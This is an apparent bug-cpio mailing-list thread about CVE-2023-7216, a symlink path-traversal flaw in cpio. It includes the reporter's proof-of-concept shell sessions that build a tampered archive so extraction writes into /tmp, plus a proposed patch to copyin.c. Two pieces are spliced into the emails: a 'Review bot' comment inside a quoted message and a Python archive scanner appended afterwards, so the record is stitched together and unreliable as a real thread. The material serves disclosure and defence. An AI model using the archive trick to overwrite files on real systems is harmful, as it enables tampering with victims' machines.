Hello Peng,

Thank you for the detailed report! This information needs to get to [email protected], and I am including that email address now. In future please use that account as a way to get in contact with Red Hat Product Security. 💜

~Nick Tait
Senior Product Security Engineer

On Thu, Feb 29, 2024 at 6:37 AM Peng <[email protected]> wrote:

> Dear cpio maintainer:
>
> This is a Red Hat Community Report on CVE-2023-7216:
> https://bugzilla.redhat.com/show_bug.cgi?id=2249901
>
> CVE-2023-7216 can cause path traversal when opening a cpio archive,
> which can lead to malicious file overwrites of arbitrary directories.
>
> Redhat CVE-2023-7216's PoC can be reproduced using the following
> method:
> ```
> [root@localhost home]# mkdir testcpio
> [root@localhost home]# ln -sf /tmp/ testcpio/tmp
> [root@localhost home]# echo "TEST Traversal" > testcpio/tmpYtrav.txt
> [root@localhost home]# cd testcpio/
> [root@localhost testcpio]# ls | cpio -ov > ../trav.cpio
> tmp
> tmpYtrav.txt
> 1 block
> [root@localhost testcpio]# cd ..
> [root@localhost home]# sed -i s/"tmpY"/"tmp\/"/g trav.cpio
> [root@localhost home]# cpio -i < trav.cpio
> [root@localhost home]# cat /tmp/trav.txt
> TEST Traversal
> [root@localhost home]# cat tmp/trav.txt
> TEST Traversal
> ```
> Based on my understanding of the PoC and analysis of CVE-2023-7216, I
> constructed two more PoC scenarios.
>
> POC1 can be reproduced using the following methods:
> Machine A can use the tampered trav.cpio file to overwrite any
> file on machine B, which may lead to remote command execution.
> ```
> Machine A
> [root@localhostA home]# mkdir testcpio
> [root@localhostA home]# ln -sf /tmp/ testcpio/tmp
> [root@localhostA home]# echo "TEST Traversal" > testcpio/tmpYtrav.txt
> [root@localhostA home]# cd testcpio/
> [root@localhostA testcpio]# ls | cpio -ov > ../trav.cpio
> tmp
> tmpYtrav.txt
> 1 block
> [root@localhost testcpio]# cd ..
> [root@localhost home]# sed -i s/"tmpY"/"tmp\/"/g trav.cpio
> ```
> Assume that machine A transfers files to machine B through scp or
> other file transfer methods.
> CVE-2023-7216 is triggered when Machine B
> opens trav.cpio
> ```
> Machine B
> [root@localhostB home]# cpio -i < trav.cpio
> [root@localhostB home]# cat /tmp/trav.txt
> TEST Traversal
> [root@localhostB home]# cat tmp/trav.txt
> TEST Traversal
> ```
> Impact of POC1: This indicates that any cpio archive file that
> contains symlinks may cause security risks such as path traversal.
>
>
> POC2 can be reproduced using the following methods:
> ```
> [root@localhost home]# mkdir testcpio
> [root@localhost home]# ln -sf /tmp/ testcpio/tmp
> [root@localhost home]# echo "TEST Traversal" > testcpio/tmpYtrav.txt
> [root@localhost home]# cd testcpio/
> [root@localhost testcpio]# ls | cpio -ov > ../trav.cpio
> tmp
> tmpYtrav.txt
> 1 block
> [root@localhost testcpio]# cd ..
> [root@localhost home]# mkdir dirA
> [root@localhost home]# sed -i s/"tmpY"/"tmp\/"/g trav.cpio
> [root@localhost home]# cpio -i < trav.cpio -D /home/dirA
> [root@localhost home]# cat /tmp/trav.txt
> TEST Traversal
> [root@localhost home]# cat dirA/tmp/trav.txt
> TEST Traversal
> ```
>
> Impact of POC2: When the -D option is used, the cpio file is expected
> to be decompressed in the specified directory. However, due to the impact
> of CVE-2023-7216, the file is also generated in the symlink directory,
> which is not as expected, like CVE-2015-1197. When the
> --no-absolute-filenames option is used, the decompressed file should be
> generated in the current directory instead of the symlink directory.
> First of all, I would like to discuss an issue with you, that is, when
> fixing CVE-2015-1197, the copy_link () function generates symlinks directly
> through the symlink () function if the --no-absolute-filenames option is
> not used when processing symlinks. This means that in this case, cpio
> allows writing files in arbitrary directories through symlinks. Is this
> what cpio was designed for?
> I believe this design is the root cause of CVE-2023-7216.
> If you think
> this is a reasonable design, please let me know your reasons and provide a
> solution for CVE-2023-7216.
> If you agree with me that cpio should not allow writing files in
> arbitrary directories through symlinks, then we can discuss my solution.
> In my view, I don't think we can guarantee that the cpio archive does
> not contain any symlinks. We must handle each symlink the same as the
> fix for CVE-2015-1197 during decompression. So I made a patch. I have
> attached the patch in the mail. If you have a better fix, please let me
> know.
>
> Look forward to your feedback and suggestions soon.
>
> Best Regards,
> Peng
>
> From 9cf2f601f9beec06b0e7b4fcf3f454195bff1b77 Mon Sep 17 00:00:00 2001
> From: Peng <[email protected]>
> Date: Thu, 29 Feb 2024 17:22:11 +0800
> Subject: [PATCH] default use symlink_placeholder() to fix Path Traversal
>
> ---
>  src/copyin.c | 26 +-------------------------
>  1 file changed, 1 insertion(+), 25 deletions(-)
>
> diff --git a/src/copyin.c b/src/copyin.c
> index ace0a02..c454313 100644
> --- a/src/copyin.c
> +++ b/src/copyin.c
> @@ -789,31 +789,7 @@ copyin_link (struct cpio_file_stat *file_hdr, int in_file_des)
>        link_name = xstrdup (file_hdr->c_tar_linkname);
>      }
>
> -  if (no_abs_paths_flag)
> -    symlink_placeholder (link_name, file_hdr->c_name, file_hdr);
> -  else
> -    {
> -      res = UMASKED_SYMLINK (link_name, file_hdr->c_name,
> -                             file_hdr->c_mode);
> -      if (res < 0 && create_dir_flag)
> -        {
> -          create_all_directories (file_hdr->c_name);
> -          res = UMASKED_SYMLINK (link_name, file_hdr->c_name, file_hdr->c_mode);
> -        }
> -      if (res < 0)
> -        symlink_error (link_name, file_hdr->c_name);
> -      else if (!no_chown_flag)
> -        {
> -          uid_t uid = set_owner_flag ? set_owner : file_hdr->c_uid;
> -          gid_t gid = set_group_flag ? set_group : file_hdr->c_gid;
> -          if (lchown (file_hdr->c_name, uid, gid) < 0 && errno != EPERM)
> -            chown_error_details (file_hdr->c_name, uid, gid);
> -        }
> -
> -      if (retain_time_flag)
> -        set_file_times (-1, file_hdr->c_name, file_hdr->c_mtime,
> -                        file_hdr->c_mtime, AT_SYMLINK_NOFOLLOW);
> -    }
> +  symlink_placeholder (link_name, file_hdr->c_name, file_hdr);
>    free (link_name);
>  }
>
> --
> 2.33.0
>
>
>
> ------------------ Original ------------------
> *From:* "Peng" <[email protected]>;
> *Date:* Thu, Feb 29, 2024 07:02 PM
> *To:* "bug-cpio"<[email protected]>; "ntait"<[email protected]>; "gray"<[email protected]>; "mrehak"<[email protected]>;
> *Subject:* Re: Is there a fix for this CVE-2023-7216?
>
> Dear cpio maintainer:
> This is a Red Hat Community Report on
> CVE-2023-7216: https://bugzilla.redhat.com/show_bug.cgi?id=2249901
> CVE-2023-7216 can cause path traversal when opening a cpio
> archive, which can lead to malicious file overwrites of arbitrary directories.
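Review bot: The removed else branch in copyin_link was the only code that consumed `res`, applied ownership (`lchown` with `set_owner_flag`/`set_group_flag`) and mtime (`set_file_times` under `retain_time_flag`), and retried with `create_all_directories` when `create_dir_flag` is set; the replacement single call to `symlink_placeholder` carries none of that, so please confirm that the placeholder path reapplies owner, group and mtime when the real symlink is created later and that `-d` still creates missing parents for a symlink entry, or document the loss. If `res` is declared earlier in the function it is now unused and will warn. The commit message should also spell out the behavioural change (every symlink is now deferred, regardless of --no-absolute-filenames), reference CVE-2023-7216 and the CVE-2015-1197 fix it generalises, and ideally add a test built from the report's `tmp -> /tmp/` plus `tmp/trav.txt` archive that checks `/tmp/trav.txt` is no longer written.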
> Redhat CVE-2023-7216's PoC can be reproduced using the
> following method:
> ```
> [root@localhost home]# mkdir testcpio
> [root@localhost home]# ln -sf /tmp/ testcpio/tmp
> [root@localhost home]# echo "TEST Traversal" > testcpio/tmpYtrav.txt
> [root@localhost home]# cd testcpio/
> [root@localhost testcpio]# ls | cpio -ov > ../trav.cpio
> tmp
> tmpYtrav.txt
> 1 block
> [root@localhost testcpio]# cd ..
> [root@localhost home]# sed -i s/"tmpY"/"tmp\/"/g trav.cpio
> [root@localhost home]# cpio -i < trav.cpio
> [root@localhost home]# cat /tmp/trav.txt
> TEST Traversal
> [root@localhost home]# cat tmp/trav.txt
> TEST Traversal
> ```
> First of all, I would like to confirm with you, do you accept
> CVE-2023-7216? Is CVE-2023-7216 a bug or is it the default behavior of cpio
> software?
> If CVE-2023-7216 is a bug, I try to provide a fix patch. Of course, if
> there is a better fix, please point it out.
> CVE-2023-7216 is similar to CVE-2015-1197; both of them use
> symlinks to cause Path Traversal. The CVE-2015-1197 fix uses
> symlink_placeholder () to fix a Path Traversal issue in the
> --no-absolute-filenames scenario. However, CVE-2023-7216 proves that path
> traversal also exists in other scenarios.
> So I made a patch to fix CVE-2023-7216: copyin_link() should
> enable symlink_placeholder() by default, not only when the
> --no-absolute-filenames option is on.
> Look forward to your feedback and suggestions soon.
> Best Regards,
> Peng
>
>
>
> ------------------ Original ------------------
> *From:* "2773414454" <[email protected]>;
> *Date:* Tue, Feb 20, 2024 11:03 AM
> *To:* "bug-cpio"<[email protected]>;
> *Subject:* Is there a fix for this CVE-2023-7216?
>
> Dear cpio maintainer:
>
> https://nvd.nist.gov/vuln/detail/CVE-2023-7216
> NVD does not provide any related patch information.
> Is there a fix for cpio's CVE-2023-7216?
> [1] If not, what is the repair plan for cpio?
> [2] If yes, can you indicate which submissions fix CVE-2023-7216?
>
> peng
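A defender-side check for the archive shape the report describes (a symlink entry followed by a file entry whose path runs through it), added here as an example that is not part of this thread or of cpio's own code: it parses the SVR4 "newc" cpio format (`cpio -H newc`; the report's `cpio -ov` writes cpio's default old binary format, which this scanner does not read) and flags absolute or `..` paths and any entry whose parent directory an earlier entry declared as a symlink. The names `build_newc`, `iter_newc` and `find_traversal` and the sample archive mirroring the `tmp -> /tmp/` and `tmp/trav.txt` entries are all constructed for this example.

```python
import posixpath

S_IFMT, S_IFLNK, S_IFREG = 0o170000, 0o120000, 0o100000
MAGIC = b"070701"  # SVR4 "newc" header magic; each header is 110 bytes

def build_newc(entries):
    """Constructed helper (not cpio code): build a newc archive from [(name, mode, payload)]."""
    out = bytearray()
    for ino, (name, mode, payload) in enumerate(list(entries) + [("TRAILER!!!", 0, b"")], 1):
        # ino mode uid gid nlink mtime filesize devmaj devmin rdevmaj rdevmin namesize check
        fields = [ino, mode, 0, 0, 1, 0, len(payload), 0, 0, 0, 0, len(name) + 1, 0]
        rec = MAGIC + b"".join(b"%08X" % f for f in fields) + name.encode() + b"\0"
        rec += b"\0" * (-len(rec) % 4)  # header + name padded to a 4-byte boundary
        out += rec + payload + b"\0" * (-len(payload) % 4)  # payload padded likewise
    return bytes(out)

def iter_newc(data):
    """Yield (name, mode, payload) for every entry before the TRAILER!!! record."""
    off = 0
    while off + 110 <= len(data):
        if data[off:off + 6] != MAGIC:
            raise ValueError("not a newc header at offset %d" % off)
        f = [int(data[off + 6 + 8 * i:off + 14 + 8 * i], 16) for i in range(13)]
        mode, size, namesize = f[1], f[6], f[11]
        name = data[off + 110:off + 110 + namesize - 1].decode()  # drop the trailing NUL
        off += 110 + namesize + (-(110 + namesize) % 4)
        payload, off = data[off:off + size], off + size + (-size % 4)
        if name == "TRAILER!!!":
            return
        yield name, mode, payload

def find_traversal(data):
    """List (name, reason) for entries that would be written outside the extraction
    directory: absolute or '..' paths, or paths through a symlink declared earlier."""
    findings, symlinks = [], {}
    for name, mode, payload in iter_newc(data):
        norm = posixpath.normpath(name)
        parts = norm.split("/")
        parents = ["/".join(parts[:i]) for i in range(1, len(parts))]  # tmp, tmp/a, ...
        via = next((p for p in parents if p in symlinks), None)
        if norm.startswith("/") or norm == ".." or norm.startswith("../"):
            findings.append((name, "absolute or parent-relative path"))
        elif via:  # cpio creates the earlier symlink, then follows it for this entry
            findings.append((name, "passes through symlink %s -> %s" % (via, symlinks[via])))
        if mode & S_IFMT == S_IFLNK:  # remember link targets for later entries
            symlinks[norm] = payload.decode(errors="replace")
    return findings

# Constructed sample mirroring the report's archive after its sed edit.
SAMPLE = build_newc([("tmp", S_IFLNK | 0o777, b"/tmp/"),
                     ("tmp/trav.txt", S_IFREG | 0o644, b"TEST Traversal\n")])
```

Running `find_traversal` on a real archive (`find_traversal(open("trav.cpio", "rb").read())`) before extracting it gives the same check the patched cpio would otherwise only apply at extraction time.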
